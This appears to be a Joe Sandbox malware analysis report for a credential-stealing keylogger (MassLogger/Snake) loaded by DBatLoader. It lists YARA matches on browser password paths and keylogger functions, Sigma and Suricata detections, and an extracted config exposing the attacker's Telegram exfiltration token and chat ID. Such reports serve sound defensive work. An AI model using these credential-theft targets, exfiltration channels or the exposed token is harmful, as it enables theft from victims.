5.2.daphpvwO.pif.298e6458.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.298e6458.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.2.daphpvwO.pif.298e6458.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.2.daphpvwO.pif.28880ee8.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.2.daphpvwO.pif.2aec0000.9.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.298e5570.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.298e5570.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.298e5570.8.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.298e5570.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.298e5570.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.298e5570.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
5.2.daphpvwO.pif.298e5570.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
5.2.daphpvwO.pif.28600ca6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28880ee8.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28880ee8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28880ee8.5.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28880ee8.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28880ee8.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28880ee8.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.2.daphpvwO.pif.28880ee8.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
0.2.ja811MqV4h.exe.29c0000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.3.daphpvwO.pif.268f6d60.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28880000.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28880000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28880000.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28880000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28880000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28880000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
5.2.daphpvwO.pif.28880000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.2990e990.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.2990e990.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.2990e990.6.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.2990e990.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.2990e990.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.2990e990.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.2.daphpvwO.pif.2990e990.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28601b8e.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28601b8e.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28601b8e.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28601b8e.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28601b8e.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28601b8e.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.2.daphpvwO.pif.28601b8e.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.298e5570.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.298e5570.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.298e5570.8.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.298e5570.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.298e5570.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.298e5570.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x46009:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x45fdd:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x460a1:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x45fb9:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x4601f:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x45dec:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x45376:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x4489f:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x432d7:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x432a6:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
5.2.daphpvwO.pif.298e5570.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a7e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x49ce5:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x49ff3:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data 0x4adeb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28880000.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28880000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28880000.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28880000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28880000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28880000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
5.2.daphpvwO.pif.28880000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.28600ca6.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28600ca6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28600ca6.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28600ca6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28600ca6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28600ca6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
5.2.daphpvwO.pif.28600ca6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
0.2.ja811MqV4h.exe.23c9548.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.298e6458.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x45121:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x450f5:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x451b9:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x450d1:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x45137:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x44f04:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x4448e:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x439b7:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x423ef:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x423be:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.2.daphpvwO.pif.298e6458.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x498ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x48dfd:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x4910b:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data 0x49f03:$a5: \Kometa\User Data\Default\Login Data
0.2.ja811MqV4h.exe.210c6e48.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.2.daphpvwO.pif.28601b8e.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
0.2.ja811MqV4h.exe.23c9548.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 132 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\ja811MqV4h.exe, ProcessId: 8664, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\daphpvwO.pif, NewProcessName: C:\Users\user\Links\daphpvwO.pif, OriginalFileName: C:\Users\user\Links\daphpvwO.pif, ParentCommandLine: "C:\Users\user\Desktop\ja811MqV4h.exe", ParentImage: C:\Users\user\Desktop\ja811MqV4h.exe, ParentProcessId: 8664, ParentProcessName: ja811MqV4h.exe, ProcessCommandLine: C:\\Users\\user\\Links\daphpvwO.pif, ProcessId: 8816, ProcessName: daphpvwO.pif

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T08:49:43.904064+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49711	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T08:49:31.199503+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	193.122.130.0	80	TCP
2025-03-11T08:49:41.139138+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T08:49:43.316526+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49711	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ja811MqV4h.exe

Avira: detected

Found malware configuration

Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}

Multi AV Scanner detection for submitted file

Source: ja811MqV4h.exe	Virustotal: Detection: 54%			Perma Link
Source: ja811MqV4h.exe	ReversingLabs: Detection: 68%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Links\daphpvwO.pif

Unpacked PE file: 5.2.daphpvwO.pif.400000.1.unpack

Source: ja811MqV4h.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp
